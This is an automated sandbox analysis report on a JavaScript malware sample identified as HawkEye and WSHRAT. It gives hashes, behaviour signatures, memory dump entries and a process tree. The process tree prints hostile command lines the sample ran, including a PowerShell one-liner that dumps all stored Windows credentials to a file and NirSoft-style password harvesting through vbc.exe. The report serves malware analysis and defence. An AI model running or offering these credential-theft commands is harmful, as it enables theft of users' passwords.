Analysis

  • max time kernel
    92s
  • max time network
    176s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    06/09/2021, 22:06

General

  • Target

    7002991002.js

  • Size

    5.0MB

  • MD5

    a20a192f6475f69d11a5517e9542becf

  • SHA1

    d21e1fc4f817ec7410d70a88403dd6e7d4f654f8

  • SHA256

    2a0356a320b8202a66e35e71cd8aa503953d8ddea284c0da06ae6f2571ec3ff5

  • SHA512

    76df370a5d38d580f120f1eaa4ea1ce64b8a80f70fd6c06db9bf78165ab0b068adb04e3bb0c0fb23231575bcf1386fada6bea21f5eb182361ec7496b8f06af78

Malware Config

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • NirSoft MailPassView 8 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 8 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 11 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Script User-Agent 10 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\7002991002.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Users\Admin\AppData\Local\Temp\whhost.exe
      "C:\Users\Admin\AppData\Local\Temp\whhost.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:108
      • C:\Users\Admin\AppData\Roaming\Windows Update.exe
        "C:\Users\Admin\AppData\Roaming\Windows Update.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
          4⤵
            PID:1536
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1308
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
        2⤵
          PID:1608
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
          2⤵
            PID:928
            • C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
              C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
              3⤵
                PID:1500
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
              2⤵
                PID:544
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM cmdc.exe
                  3⤵
                  • Kills process with taskkill
                  PID:1716
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
                2⤵
                  PID:1448
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM cmdc.exe
                    3⤵
                    • Kills process with taskkill
                    PID:1728
                • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
                  "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
                  2⤵
                    PID:1412
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
                    2⤵
                      PID:1524

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/108-64-0x00000000002A0000-0x00000000002A1000-memory.dmp

                    Filesize

                    4KB

                  • memory/108-63-0x00000000760B1000-0x00000000760B3000-memory.dmp

                    Filesize

                    8KB

                  • memory/1308-80-0x0000000000400000-0x0000000000458000-memory.dmp

                    Filesize

                    352KB

                  • memory/1308-77-0x0000000000400000-0x0000000000458000-memory.dmp

                    Filesize

                    352KB

                  • memory/1536-73-0x0000000000400000-0x000000000041B000-memory.dmp

                    Filesize

                    108KB

                  • memory/1536-76-0x0000000000400000-0x000000000041B000-memory.dmp

                    Filesize

                    108KB

                  • memory/1608-84-0x00000000024E0000-0x00000000024E1000-memory.dmp

                    Filesize

                    4KB

                  • memory/1608-86-0x0000000002770000-0x0000000002772000-memory.dmp

                    Filesize

                    8KB

                  • memory/1608-90-0x000000001B530000-0x000000001B531000-memory.dmp

                    Filesize

                    4KB

                  • memory/1608-89-0x0000000002520000-0x0000000002521000-memory.dmp

                    Filesize

                    4KB

                  • memory/1608-83-0x000007FEFB891000-0x000007FEFB893000-memory.dmp

                    Filesize

                    8KB

                  • memory/1608-85-0x000000001AA50000-0x000000001AA51000-memory.dmp

                    Filesize

                    4KB

                  • memory/1608-88-0x00000000028F0000-0x00000000028F1000-memory.dmp

                    Filesize

                    4KB

                  • memory/1608-87-0x0000000002774000-0x0000000002776000-memory.dmp

                    Filesize

                    8KB

                  • memory/1940-72-0x00000000009B6000-0x00000000009B7000-memory.dmp

                    Filesize

                    4KB

                  • memory/1940-70-0x00000000009A0000-0x00000000009A1000-memory.dmp

                    Filesize

                    4KB